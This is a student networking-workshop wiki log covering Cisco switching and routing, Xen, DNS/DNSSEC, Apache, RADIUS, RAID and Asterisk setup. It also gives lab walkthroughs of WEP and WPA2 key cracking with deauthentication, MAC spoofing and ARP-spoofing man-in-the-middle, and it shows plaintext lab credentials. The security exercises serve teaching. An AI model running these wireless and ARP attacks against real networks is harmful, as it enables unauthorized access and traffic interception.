G1 : Advanced Networking Protocol Workshop

De Wiki de Projets IMA

The main aim of this workshop is to realize a redundant network infrastructure to ensure maximum availability in case of a device or path failure. The architecture of the network is shown in the diagram given below.

Network architecture.PNG


Scope statement for the specific task

Task overview

We were assigned to configure one of the L3 switches to enable routing protocol(for IPv4 and IPv6) and also to ensure layer 3 redundancy with HSRP.

Materials used for the specific task

  • Layer-3 Switch : Cisco Catalyst 3560-E
  • PC with serial connection

Workshop progress

Week 1 (28/09/2015)

During this week, we colloborated with group 2 (Sandra & Elise) to create a list of VLANs and attribute IP address to each of them.

VLAN

Then, we configured the router to create the vlan database (vlan 11 - vlan 20).

vlan 11
name vlan11
exit

802.1Q encapsulation

To enable inter-VLAN communication, we had to configure a port (which is connected to switch) in trunk mode and enable encapsulation using the following commands :

interface Gi1/1/2
switchport trunk encapsulation
switchport mode trunk
switchport trunk allowed vlan 1,11-20,110,130

HSRP (ipv4 + ipv6)

To enable routing in the L3 switch:

ip routing
ipv6 unicast-routing

Configuration of HSRP for ipv4 (for L3 redundancy) :

interface vlan 11
ip address 172.20.11.253 255.255.255.0
standby version 2
standby 1 priority 100
standby 1 preempt
standby 1 timers 5 15
standby 1 ip 172.20.11.254

Configuration of HSRP for ipv6 :

int vlan11
 ipv6 enable
 ipv6 address 2001:660:4401:60B1::/64 eui-64
 ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900
 ipv6 nd router-preference high
 standby 101 ipv6 autoconfig
 standby 101 priority 100
 standby 101 preempt
 standby 101 timers 5 15

OSPF

To receive and share the ipv4 routing table with the adjacent routers, we configured the OSPF protocole.

router ospf 1
 router-id 192.168.222.2
 summary-address 172.20.0.0 255.255.0.0
 summary-address 193.48.57.160 255.255.255.240
 network 192.168.222.0 0.0.0.7 area 1

RIP-ng

On the other hand, we also configured RIP-ng so that the ipv6 routing table could be shared with adjacent routers.

ipv6 router rip tpima5sc
 redistribute connected metric 1
 redistribute rip 1 metric 1
 redistribute static metric 1
int vlan130
 ipv6 rip tpima5sc enable


conf files :

Week 2 (05/10/2015)

To create a Xen VM, we started with connecting to the cordouan machine (using ssh):

ssh root@cordouan.insecserv.deule.net

Configuration of XEN VM

xen-create-image --hostname=WESTMALLE --ip=193.48.57.161 --netmask=255.255.255.240 --gateway=193.48.57.174 \
--nameserver=193.48.57.48 --dir=/usr/local/xen --genpass=0 --password=pasglop --dist=stable

To start the VM:

xl create /etc/xen/WESTMALLE.cfg

We modified the size of the memory and network connection (bridge networking) for the VM :Fichier:WESTMALLEcfg.txt

To connect to Xen VM using console mode, we used the command:

xl console WESTMALLE

Week 3 (12/10/2015)

This week we started with installing few important packages in the Xen virtual server such as apache2, fail2ban, bind9, dnsutils and openssh-server. To secure the ssh server, we changed the configuration line (as shown below) of the file /etc/ssh/sshd_config:

Port 619
PermitRootLogin no-password

To enable root login, we had to generate an asymmetric key (private and public) where the public key will be stored in the server while the user who wishes to connect to the server must have the private key. To generate the asymmetric key, we used the command:

ssh-keygen -b 2048

Then, the public key had to be stored in a file called authorized_keys2 (for SSHv2).

After that, we continued to configure the DNS server. First of all, we bought a domain name from one of the domain name registrars, Gandi. Since we wanted to host our own DNS server, we pointed the primary DNS field to our computer (ns1.troisiemesexe.lol). The secondary DNS field was filled with Gandi’s secondary NS server. It was time we configured our own DNS server.

/etc/hosts:

127.0.0.1       localhost
193.48.57.161   westmalle.troisiemesexe.lol  westmalle
193.48.57.161   ns1.troisiemesexe.lol        ns1

/etc/host.conf:

order hosts, bind
multi on

/etc/resolv.conf:

domain troisiemesexe.lol
search troisiemesexe.lol
nameserver 127.0.0.1
nameserver 193.48.57.48

/etc/bind/db.troisiemesexe.lol:

$TTL            604800
@       IN      SOA     ns1.troisiemesexe.lol. admin.troisiemesexe.lol. (
                         2015101705     ; Serial
                         900            ; Refresh
                         28800          ; Retry
                         604800         ; Expire
                         86400 )        ; Minimum

@               IN      A       193.48.57.161
;@              IN      AAAA    ::1

@               IN      NS      ns1.troisiemesexe.lol.
@               IN      NS      ns6.gandi.net.

ns1             IN      A       193.48.57.161
;ns1            IN      AAAA    :::1

westmalle       IN      A       193.48.57.161
arch            IN      A       193.48.57.174   ;arch -> router
www             IN      A       193.48.57.161

/etc/bind/named.conf.local:

zone "troisiemesexe.lol" IN {
        type master;
        file "/etc/bind/db.troisiemesexe.lol";
        allow-transfer {217.70.177.40;};
        allow-query {any;};
        notify yes;
};

And then, we configured the apache VirtualHosts. If the server receives an HTTP request on port 80, it will rewrite the URL to HTTPS on port 443.

/etc/apache2/sites-available/troisiemesexe.lol.conf:

<VirtualHost *:80>
        ServerName   troisiemesexe.lol
        ServerAlias  www.troisiemesexe.lol      *.troisiemesexe.lol
        ServerAdmin  root@troisiemesexe.lol
        DocumentRoot /var/www/troisiemesexe.lol

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log  combined

        RewriteEngine on
        ReWriteCond  %{HTTP_HOST}   !^(westmalle|ns1) [NC]
        ReWriteCond  %{SERVER_PORT} !^443$
        RewriteRule  ^/(.*)         https://%{HTTP_HOST}/$1 [NC,R=301,L]

        RewriteRule  ^(.*)$         https://www.troisiemesexe.lol$1 [R=301,L]
</VirtualHost>

<IfModule mod_ssl.c>
        <VirtualHost *:443>
                ServerName   troisiemesexe.lol
                ServerAlias  www.troisiemesexe.lol
                ServerAdmin  root@troisiemesexe.lol
                DocumentRoot /var/www/troisiemesexe.lol

                ErrorLog ${APACHE_LOG_DIR}/error.log
                CustomLog ${APACHE_LOG_DIR}/access.log combined

                SSLEngine               on
                SSLCertificateFile      /etc/ssl/certs/troisiemesexe.lol.crt
                SSLCertificateKeyFile   /etc/ssl/private/troisiemesexe.lol.key
                SSLCertificateChainFile /etc/ssl/certs/GandiStdSSLCA2.pem
                SSLVerifyClient         None
        </VirtualHost>
</IfModule>

To enable the site, we used the command:

a2ensite troisiemesexe.lol

Week 4 (22/10/2015)

Configuration of wireless network in eeePC by editing the the file in /etc/network/interfaces

auto wlan0
iface wlan0 inet static
	wireless-essid	troubadour
	wireless-mode   managed
	address		192.168.1.2
	netmask		255.255.255.0
	gateway		192.168.1.1

Since a MAC address filter was implemented, we had to change our eeePC's original MAC address to the one found in ACL of the Cisco Access Point as below:

ifconfig wlan0 hw ether 00:15:AF:E6:ED:C4

Week 5 (12/11/2015)

Cracking the WEP key

  • We started airmon-ng in wlan0
airmon-ng start wlan0
  • We killed the process that has been using the airmon-ng utility in wlan0:
airmon-ng check kill
  • Then, we analyzed the visible networks in wlan0
airodump-ng wlan0mon
  • Our target is cracotte01. And we'll be storing (all the packets to the destination of 00:23:5E:1E:05:40 ) in the file fromage.cap
airodump-ng --essid cracotte01 --write fromage -c 7 --bssid 00:23:5E:1E:05:40 wlan0mon
  • While the output was being stored in the file, we opened a new terminal and launched another command to decode those packets and store them in a file called KEY.
aircrack-ng -l KEY -s -f 15 fromage-01.cap
  • Result of the WEP crack:
55555555555555555555555551

Week 6 (19/11/2015)

Cracking WPA key

  • First of all, we had to generate a dictionary to crack the WPA key. Aircrack-ng isn't capable of generating the dictionary. So, we used crunch, which is an utility used to generate list of keys using a certain pattern. We used crunch to generate list of keys of a minimum (and maximum) length of 8 characters . The result, stored in the file dico.txt, starts at 00000000 and ends at 999999999.
crunch 8 8 0123456789 > dico.txt
  • To sniff the wireless network:
airmon-ng start wlan0 
airmon-ng check kill
airodump-ng wlan0mon #on sniffe tous les flux wifi
  • We were trying to crack the "cracotte01" network:
airodump-ng --essid cracotte01 -c 12 --bssid 04:DA:D2:9C:50:50 -w dump wlan0mon
#-c : channel;
#-w : storage file; 
  • Result:
CH 12 ][ Elapsed: 54 s ][ 2015-11-19 11:35 ][ WPA handshake: 04:DA:D2:9C:50:50                                         
                                                                                                                                                                               
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                                               
 04:DA:D2:9C:50:50  -49  11      522       71    0  12  54e. WPA2 CCMP   PSK  cracotte01                                                                                       
                                                                                                                                                                               
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                                     
                                                                                                                                                                               
 04:DA:D2:9C:50:50  00:0F:B5:92:22:68  -59   54e- 1e     0       49 

  • And then, we used aireplay-ng utility to crack the key from the dump file:
aireplay-ng --deauth=5 -a 04:DA:D2:9C:50:50 wlan0mon
  • Result:
11:53:17  Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:50) on channel 12
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
11:53:17  Sending DeAuth to broadcast -- BSSID: [04:DA:D2:9C:50:50]
11:53:17  Sending DeAuth to broadcast -- BSSID: [04:DA:D2:9C:50:50]
11:53:18  Sending DeAuth to broadcast -- BSSID: [04:DA:D2:9C:50:50]
11:53:18  Sending DeAuth to broadcast -- BSSID: [04:DA:D2:9C:50:50]
11:53:19  Sending DeAuth to broadcast -- BSSID: [04:DA:D2:9C:50:50]


  • We used the dico.txt file (which is the dictionary) to decode the dump-01.cap file:
aircrack-ng dump-01.cap -w dico.txt -l KEY

Result:
Aircrack.PNG

Week 7 (26/11/2015)

FreeRadius + AP

To authenticate via PEAP-TLS, it's important to modify the default_eap_type to peap in the configuration eap.conf file:

default_eap_type = peap

Then, users' list need to be added for Radius Authentication in the users file:

magesh     Cleartext-Password := "h3ll0"
           Reply-Message = "Hello, %{User-Name}"

Now we had to add clients (both Access Points at 10.10.10.1 and 10.10.10.2) to the clients.conf file :

	
client 10.10.10.1 {
   secret     = mys3cr3t
   shortname  = vlan_1_e304
}

client 10.10.10.2 {
   secret     = mys3cr3t2
   shortname  = vlan_1_e306
}

At last, it was time we configured both Access Points (10.10.10.1 and 10.10.10.2) to enable SSID diffusion and Radius authentication

aaa new-model
!
aaa group server radius radius_group_HnM
   server name radius_westmalle
!
aaa authentication login eap_HnM group radius_group_HnM
!
dot11 ssid HnM
vlan 11
   authentication open eap eap_HnM
   authentication network-eap eap_HnM
   authentication key-management wpa
   mbssid guest-mode
!
interface Dot11Radio0
   encryption vlan 11 mode ciphers aes-ccm tkip
   ssid HnM
   mbssid
!
interface Dot11Radio0.11
   encapsulation dot1Q 11
   bridge-group 11
!
interface GigabitEthernet0.11
   encapsulation dot1Q 11
   bridge-group 11
!
radius server radius_westmalle
   address ipv4 193.48.57.161 auth-port 1812 acct-port 1813
   key 7 11081D3313015C0E
!

To connect to the Acces Point with eeePC, these changes had to be made to the file /etc/network/interfaces :

auto wlan0
iface wlan0
   wpa-ssid HnM
   wpa-key-mgmt WPA-EAP
   wpa-identity magesh
   wpa-password h3ll0
   address 172.20.11.1
   netmask 255.255.255.0
   gateway 172.20.11.254

RAID5

To enable hard disk redundancy (and fault-tolerance), we configured three logical volumes in the host machine :

lvcreate -L 1G -n /dev/virtual/ima5-westmalle-raid5-1
lvcreate -L 1G -n /dev/virtual/ima5-westmalle-raid5-2
lvcreate -L 1G -n /dev/virtual/ima5-westmalle-raid5-3

This logical volumes had to be included in the Xen configuration file /etc/xen/WESTMALLE.cfg:

disk  = [
            'file:/usr/local/xen/domains/WESTMALLE/disk.img,xvda2,w',
            'file:/usr/local/xen/domains/WESTMALLE/swap.img,xvda1,w',
            'phy:/dev/virtual/ima5-westmalle-raid5-1,xvdb,w',
            'phy:/dev/virtual/ima5-westmalle-raid5-2,xvdc,w',
            'phy:/dev/virtual/ima5-westmalle-raid5-3,xvdd,w',
        ]

In the Xen virtual machine, we created RAID-5 volume /dev/md0 :

mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvd[bcd]

But, after a system restart /dev/md0 had been automatically renamed to /dev/md127. Thus, we had to create a ext4 filesystem based on md127 and not md0.

mkfs.ext4 /dev/md127

To make sure the persistence of the mounted volume, we had to modify mdadm configuration file (/etc/mdadm/mdadm.conf) and file systems table.

mdadm --detail --scan >> /etc/mdadm/mdadm.conf

And in /etc/fstab we added the following line :

# <file system>  <mount point>   <type>   <options>       <dump>  <pass>
   /dev/md127   /media/raid_vol   ext4     defaults          0       0

DNSSEC

TO enable DNSSEC, we modified the named.conf.options file as below :

dnssec-enable yes;

Then, we generated a KSK and ZSK file (and renamed them) which will be used to sign our zone.

dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE troisiemesexe.lol
dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE troisiemesexe.lol

Then, the following lines were added to include the signed key in the DNS zone file /etc/bind/db.troisiemesexe.lol :

$include /etc/bind/troisiemesexe.lol.dnssec/troisiemesexe.lol-ksk.key
$include /etc/bind/troisiemesexe.lol.dnssec/troisiemesexe.lol-zsk.key

And, the zone file was signed using the command :

dnssec-signzone -o troisiemesexe.lol -k troisiemesexe.lol-ksk ../db.troisiemesexe.lol troisiemesexe.lol-zsk

To use the signed zone file instead of the unsigned one, we modified named.conf.local file :

zone "troisiemesexe.lol" IN {
   ...
   file "/etc/bind/db.troisiemesexe.lol.signed";
   ...
}

And then, we copied the ZSK and KSK key file to Gandi's DNSSEC section.

Asterisk

To reject unidentified calls, sip.conf had to be edited :

[general]
allowguest=no
alwaysauthreject=yes
contactacl=local_ip_acl

The contactacl parameter is used to filter calls from certain IP address. We wanted to limit the calls between the local systems. So we added the ACL to permit only private IP addresses in the /etc/asterisk/acl.conf :

[local_ip_acl]
   deny=0.0.0.0/0.0.0.0
   permit=10.0.0.0/255.0.0.0
   permit=172.16.0.0/255.240.0.0
   permit=192.168.0.0/255.255.0.0

The user configuration file needed some modification so that a SIP connection could be established. For that, we modified the file /etc/asterisk/users.conf and added few extensions (such as 101, 102.. which were attributed for certain username) :

[general]
userbase = 100
hasvoicemail = yes
vmsecret = mys3cr3t
hassip = yes
hasiax = yes
hasmanager = no

callwaiting = yes
threewaycalling = yes
callwaitingcallerid = yes
transfer = yes
canpark = yes
cancallforward = yes
callreturn = yes
callgroup = 1
pickupgroup = 1

[template](!)
type=friend
host=dynamic
dtmfmode=rfc2833
context = tpima5

[101]
fullname = Magesh S
defaultuser = magesh
secret = s3cr3t

[102]
fullname = Hideo V
defaultuser = hideo
secret = s3cr3t

Configuration of extensions.conf file :

[tpima5]
exten => _1XX,1,Dial(SIP/${EXTEN},10)
exten => _1XX,2,Hangup()

Week 8 (30/11/2015)

MITM

  • To identify the router's IP address:
ip route show

Result:

default via 172.26.79.254 dev eth0 

The route's virtual IP is 172.26.79.254

  • To identify the target's IP:
#dig zabeth04.insecure.deule.net

Result:

zabeth04.insecure.private.direct.deule.net. 3600 IN A 172.26.75.157

Target's IP address is 172.26.75.157.

  • Before sniffing the network, we had to authorize IP forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
  • We opened 2 terminals:

First terminal:

arpspoof -i eth0 -t  172.26.79.254 172.26.75.157

Second terminal:

arpspoof -i eth0 -t 172.26.75.157 172.26.79.254

DHCP for vlan

On the other hand, we configured DHCP in the router so that clients (ex: mobile phone) which couldn't be configured with static IP, will be given IP addresses automatically.

ip dhcp excluded-address 172.20.11.1 172.20.11.10

ip dhcp pool dhcp_pool_vlan11
   network 172.20.11.0 255.255.255.0
   default-router 172.20.11.254
   dns-server 193.48.57.48 193.48.57.33